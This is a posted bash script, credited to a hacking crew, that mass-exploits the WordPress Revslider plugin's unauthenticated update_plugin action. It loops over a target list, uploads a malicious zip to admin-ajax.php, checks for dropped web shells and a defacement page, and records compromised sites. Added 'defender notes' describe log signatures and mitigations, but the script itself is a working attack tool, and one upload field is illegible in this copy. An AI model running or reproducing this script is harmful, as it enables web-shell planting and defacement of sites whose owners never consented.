WordPress Revslider exploit (an old exploit, but many sites are still vulnerable to this PoC)
Code:
!/bin/bash
#coded = Gantengers Crew
#Please download the file first revslider.zip
#######################################
# Sends one multipart POST to the WordPress AJAX endpoint of the host in $1.
# Arguments: $1 - host (and optional path) without scheme
# Outputs:   response body is written to tmp/resp.txt
#
# Defender notes (what this looks like from the server side):
#   - POST /wp-admin/admin-ajax.php carrying the form fields
#     action=revslider_ajax_action and client_action=update_plugin.
#     The request carries no cookie or nonce, so the plugin's update
#     handler is being reached without an authenticated session.
#   - The User-Agent below is a fixed, very old Firefox 3.0.16 string; together
#     with the two form fields it makes a usable access-log / WAF signature.
#   - Mitigation is on the plugin side: run a patched Revslider release, and
#     check themes that bundle their own copy of the plugin.
# NOTE(review): the third -F field is not legible in this copy of the page.
#######################################
UploadREV(){
# 10-second connect and total timeouts; --silent hides progress and errors.
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_plugin" \
-F "action=revslider_ajax_action" \
-F "[email protected]" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
#######################################
# Fetches /id.php from the host in $1 and looks for a fixed marker string.
# Globals:   urlnya, XHOST (read; set by the caller's loop in Exp)
# Arguments: $1 - host (and optional path) without scheme
# Outputs:   status lines on stdout; on a match the URL is appended to
#            shell.txt
#
# Defender notes:
#   - An id.php in the web root that the site owner did not deploy, and the
#     page text "Hacked by PKR~X", are the indicators this function checks
#     for; both can be searched for on disk and in served content.
#   - A GET for /id.php shortly after the admin-ajax.php POST is the
#     follow-up request to correlate in access logs.
#######################################
CKDFC(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/id.php" -o tmp/cdfc.txt
# No output file means curl got no response body at all (reported as "RTO").
if [ ! -f tmp/cdfc.txt ];then
echo "[+] $urlnya : RTO"
# NOTE(review): 'continue' here targets the loop in the caller, not a loop in
# this function.
continue
fi
# Case-insensitive search for the marker; grep's exit status is kept in cdfc.
cat tmp/cdfc.txt | grep -i "Hacked by PKR~X" > /dev/null;cdfc=$?
if [ $cdfc -eq 0 ];then
echo "[+] Uploading shell"
echo "[+] ${XHOST}/id.php : Upload shell success "
echo "http://${1}/id.php" >> shell.txt
else
echo "[+] $urlnya : Upload shell failed"
fi
# Remove the temporary response so the next host starts clean.
rm -f tmp/cdfc.txt
}
#######################################
# Fetches a PHP file from the plugin's update-extraction directory on the host
# in $1 and checks the response for a fixed marker string.
# Globals:   urlnya, XHOST (read; set by the caller's loop in Exp)
# Arguments: $1 - host (and optional path) without scheme
# Outputs:   status lines on stdout; on a match the URL is appended to
#            success.txt and CKDFC is run for the same host
#
# Defender notes:
#   - The path requested is
#     wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php.
#     Any PHP file under revslider/temp/update_extract/ that was not put
#     there by an administrator-initiated plugin update is worth treating as
#     an indicator of compromise.
#   - Denying PHP execution in that temp directory at the web-server level
#     stops a dropped file from running even if the upload itself succeeds.
#   - The marker text checked for is "Successfull Shell Uploaded".
#######################################
CD(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" -o tmp/cd.txt
# No output file means curl got no response body at all (reported as "RTO").
if [ ! -f tmp/cd.txt ];then
echo "[+] $urlnya : RTO"
# NOTE(review): 'continue' here targets the loop in the caller, not a loop in
# this function.
continue
fi
# Case-insensitive search for the marker; grep's exit status is kept in cd.
cat tmp/cd.txt | grep -i "Successfull Shell Uploaded" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "[+] ${XHOST}/ : Exploit successfully "
echo "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" >> success.txt
# Second-stage check for /id.php on the same host.
CKDFC $urlnya
else
echo "[+] $urlnya : exploit failed"
fi
# Remove the temporary response so the next host starts clean.
rm -f tmp/cd.txt
}
#######################################
# Main loop: walks every whitespace-separated entry of the file named by $list
# and runs UploadREV followed by CD against each one not seen before.
# Globals:   list (read), urlnya and XHOST (written), load.txt (read/appended)
# Outputs:   whatever UploadREV / CD / CKDFC print
#
# Defender notes:
#   - The loop is sequential and unauthenticated, so from a single site's
#     point of view the footprint is small: one POST to admin-ajax.php and at
#     most two GETs, all over plain http:// with the same User-Agent.
#   - Because every request is built with http://, a site that only answers
#     on HTTPS sees the requests arrive at its port-80 listener first.
#######################################
Exp(){
for url in `cat $list`
do
# Strip the scheme and collapse doubled slashes (the trailing 1 / 2 after the
# awk action is just an always-true pattern that prints the line).
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
# Same normalisation, then every remaining '/' is removed as well.
XHOST=$(echo $url | awk '{gsub("http://","")}2' | awk '{gsub("https://","")}2' | awk '{gsub("//","/")}2' | awk '{gsub("//","/")}2' | awk '{gsub("/","")}2')
if [ ! -f load.txt ];then
touch load.txt
fi
# load.txt is the "already processed" ledger; grep treats $urlnya as a
# pattern, so this is a regex/substring match rather than an exact one.
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
# already processed: the entry is recorded in load.txt
# to process it again, delete load.txt
continue
fi
UploadREV $urlnya
CD $urlnya
done
}
#######################################
# Pre-flight check: makes sure the scratch directory exists and that the input
# list file is present.
# Globals:   list (read)
# Outputs:   a message on stdout when the list file is missing
# Returns:   exits the script (status of the preceding echo) if $list is not
#            a regular file
#######################################
Lengkap(){
# tmp/ holds the per-request response files written by the curl calls.
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f $list ];then
echo "[?] file $list gak ada"
exit
fi
}
# Entry point: prompt for the path of the list file, run the pre-flight check,
# then start the per-host loop. Results accumulate in success.txt, shell.txt
# and load.txt in the current working directory.
read -p "[+] Enter list target = " list
Lengkap
Exp